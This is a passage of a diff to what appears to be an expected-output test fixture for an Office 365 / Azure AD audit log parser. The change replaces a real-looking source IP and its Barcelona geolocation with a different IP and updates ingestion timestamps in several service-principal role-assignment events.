\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -5682,25 +5178,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5714,7 +5192,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -5850,7 +5328,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -5862,12 +5340,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036243800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124999500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -5893,25 +5371,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5925,7 +5385,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -6061,7 +5521,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -6073,12 +5533,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036250100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125003300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_e